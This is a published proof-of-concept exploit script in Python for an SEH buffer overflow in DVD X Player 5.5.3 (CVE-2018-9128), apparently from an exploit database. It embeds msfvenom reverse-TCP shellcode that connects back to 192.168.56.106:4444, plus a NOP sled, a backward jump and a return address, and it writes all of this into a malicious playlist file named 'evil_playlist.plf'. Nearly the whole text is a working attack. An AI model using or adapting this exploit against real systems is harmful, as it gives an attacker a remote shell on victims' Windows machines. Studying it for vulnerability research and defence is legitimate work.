#!/usr/bin/env python # Exploit Title: DVD X Player 5.5.3 Buffer Overflow # Date: 20.03.2019 # Exploit Author: Paolo Perego - paolo@armoredcode.com # Vendor Homepage: http://www.dvd-x-player.com # Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe # Version: 5.5.3.8 and above # Tested on: Windows 7 Professional SP1 x86 # CVE : CVE-2018-9128 # Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 # In Windows 7, SEH handler to be used contains a \x00 byte that it has been # obtained using a restricted char. For such a reason, every jump has to be # backward on the beginning of attacking shellcode. # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode shellcode = "" shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a" shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a" shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93" shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c" shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed" shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c" shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18" shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28" shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68" shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c" shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1" shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08" shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5" shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed" shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf" shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0" shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10" shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c" shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50" shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2" shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75" shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6" shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0" shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d" shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1" shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58" shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30" shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94" shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30" shellcode += "\x6b\xc2\x36" junk = "\x90" * (600 -len(shellcode)) junk += shellcode # nasm > jmp $-400 # 00000000 E96BFEFFFF jmp 0xfffffe70 backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF" junk += backflip # 00401838 |. 5E POP ESI junk += "\xeb\xf6\x90\x90" junk += "\x38\x18\x40\x1a" file = open("evil_playlist.plf", "w") file.write(junk) file.close()